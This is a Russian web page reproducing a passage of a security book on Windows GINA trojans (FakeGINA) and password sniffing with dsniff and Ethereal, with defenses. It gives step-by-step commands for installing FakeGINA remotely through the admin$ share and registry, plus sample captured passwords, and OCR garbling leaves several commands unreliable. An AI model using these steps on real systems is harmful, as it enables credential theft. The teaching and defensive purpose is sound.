На главную | Содержание | Назад | Вперёд
Наши друзья

 

 

"Троянские" программы

для аутентификации и авторизации
Программа для идентификации и авторизации с графическим пользовательским интер­фейсом (Graphical Identification and Authorization, GINA) выполняет функции посредника между пользователем и системой аутентификации Windows. Когда вы загружаете компьютер, и появляется окно с предложением нажать комбинацию клавиш <CTRL+ALT+DEL> для
Глава 8. Расширение сферы влияния 209
входа в систему, — это работает программа GTNA. Конечно же, взломом этой программы за­интересовались многие хакеры, поскольку через нее проходит слишком ценная информация. Например, существует программа, которая внедряется между пользователем и операционной системой для перехвата паролей.
Ч   в' /А
FakeGINA


Популярность

3

 

Простота

3

 

Опасность

9

Степень риска

5

 

Вместо регистратора нажатий клавиш, такого как IKS, можно использовать Программы другого типа, например программу FakeGINA, которую написал Арке Видстром (Ame Vidstrom) из компании Ntsecurity.nu (см. раздел "Дополнительная литература и ссылки''). Эта программа перехватывает запросы на подключение между службой Winlogon и программой GINA, полу­чая имя пользователя и его пароль. Программа FakeGINA записывает перехваченные данные В текстовый файл. Для выполнения своих функций она заменяет существующую запись для файла tnsgiпа. dll в реестре.
Чтобы произвести установку программы на удаленную систему, хакер должен выполнить следующие действия.
1. Скопировать файл fakegina.dll в каталог %Systemitoot%\system32 удален­ной системы.
С-.\>сору fakegina.dll \\10,1.1. 5\admin$\systenL3 2
2. Используя утилиту reg.exe из пакета Resource Kit, добавить в реестр Windows параметр.
c:\>reg add "SOFTWARE\MicroeoftXWlndowa ST\Cuxr*ntY*rsion\ Kinlogoo\GinaOLL=£akesina.all" REOJ9Z W10.1.1.3
Connecting to remote machine \\10.1.1.3 The operation completed successfully.
3. Перезагрузить систему с помощью утилиты shutdown из пакета Resource Kit.
C:\>»hutdo*m W10.1.1.3 /R /1:1 /If 1С
4. Дождаться, пока кто-нибудь подключится к системе, после этого из файла %SystemRoot%\system32\passlist. txt узнать использованные имя пользовате­ля и пароль. Если злоумышленник смонтировал совместно используемый ресурс с$ в свою систему как диск I:, то необходимо выполнить следующие команды.
I:Windows\system32> type paeslist.txt
FHED-W2KS\StU n0t4ll2c FRED-W2KS\Adrainistrator h4pped4ze
Как видите, пользователь Stu использует пароль nOt4u2c, а пользователь Administrator — пароль h4pped4ze. Злоумышленник может записать эти пароли и ждать подключения других пользователей.

О Защита от "троянских" программ GINA


Бюллетень

Нет

 

 

 

вт

Нет

 

 

 

Исправлено в SP

Нет

 

 

 

Фиксируется

Нет

 

 

 

Как и для большинства атак, описанных в этой главе, лучшая защита — не дать злоумышлен­нику получить права администратора в системе. Но можно попробовать найти некоторые файлы (при условии, что взломщик не переименовал их), которые помогут определить, использовался ли этот способ при взломе системы. Это файлы f akegina .dll и passlist. txt. Оба они должны находиться в каталоге %SystemRoot%\system32.
Анализ пакетов ■
Технология анализа пакетов данных, передаваемых по сети, известна уже более десяти лет. Но лишь в течение пяти последних лет были выпущены средства для перехвата паролей из передаваемой по линии связи информации. Перехват пакетов во время аутентификации по сети — один из наиболее эффективных способов сбора паролей и имен пользователей. Для многих служб шифрование не требуется, поэтому пароли передаются по линии связи в неза­шифрованном виде и их легко записать.
Вероятно, одна из самых популярных утилит для общего анализа пакетов — это проверен­ная на деле программа Sniffer Pro от компании Network Associates, Inc. Их утилита для DOS стала основной в наборе инструментов многих администраторов, а программа для Windows быстро подтвердила свои претензии на первое место. Также популярна бесплатная програм­ма для анализа пакетов Snort, которая работает из командной строки Windows. Но эти про­граммы перехватывают все пакеты, передаваемые по сети. А что. если они будут перехваты­вать только имена пользователей и их пароли?
f' Программа dsniff для Win32


Популярность

 

3

Простота

3

Опасность

9

Степень риска

5

Оригинальная программа dsni f f была написана для использования в UNIX хакером Dug Song. Утилита dsniff представляет собой один из лучших механизмов перехвата пакетов, она автоматически разбирает данные многих приложений и выбирает из них только имена пользователей и пароли. Версию утилиты dsniff для Win32 написал Майк Дэвис (Mike Davis) из компании 3Com. Хоть в эту программу и не вошли многие утилиты из версии для UNIX (например arpredirect), она успешно выполняет нужную нам функцию, т.е. пере­хват паролей. В следующем примере показан перехват пароля протокола POP утилитой dsniff.
С:\>dsniff
05/20/00 12:11:01 client.example.com -> nail.example.com (pop) USER johnnie PASS 4£un?
Анализатор пакетов Ethereal


Популярность

 

8

Простота

8

Опасность '

 

7

Степень риска

 

8

Программа Ethereal способна работать на различных платформах, предназначена для ана­лиза сетевых пакетов и просто ошеломляет своими возможностями. Она поставляется в вер­сиях для работы через командную строку и через графический интерфейс. Версия с графиче­ским интерфейсом поставляется с подробными и новейшими расшифровками пакетов раз­ных протоколов. Версия для командной строки называется tethereal, для ее работы требу­ется установленный на удаленной системе драйвер WinPcap. Для запуска утилиты tethereal без анализа имен узлов используется недокументированный параметр -п, в ре­зультате использования которого существенно повышается производительность программы, поскольку она автоматически не выясняет имена узлов, соответствующих найденным в сети адресам. В настоящее время Ethereal не выполняет автоматический анализ пакетов для извле­чения данных аутентификации, как это делают другие описанные в данном разделе програм­мы, но нам она все равно нравится.
Защита от анализаторов сетевых пакетов


Бюллетень

 

Нет

 

BID

 

Нет

 

Исправлено в SP

 

Нет

 

Фиксируется

Пет

 

Единственное реальное средство против анализа сетевых пакетов заключается в примене­нии технологий шифрования, которые называются Secure She\l (SSH), Secure Socket Layer (SSL), защита почты шифрованием Pretty Good Privacy (PGP) или шифрования на уровне се­тевых протоколов, таких как основанные на IPSec программы для создания виртуальных ча­стных сетей. Это единственный надежный способ противодействия перехвату пакетов в сети.
Убедитесь в том, что программы используют протокол SSH версии 2, так как в версии 1 этого протокола недавно были обнаружены серьезные недостатки.

 

На главную | Содержание | Назад | Вперёд
 
Яндекс.Метрика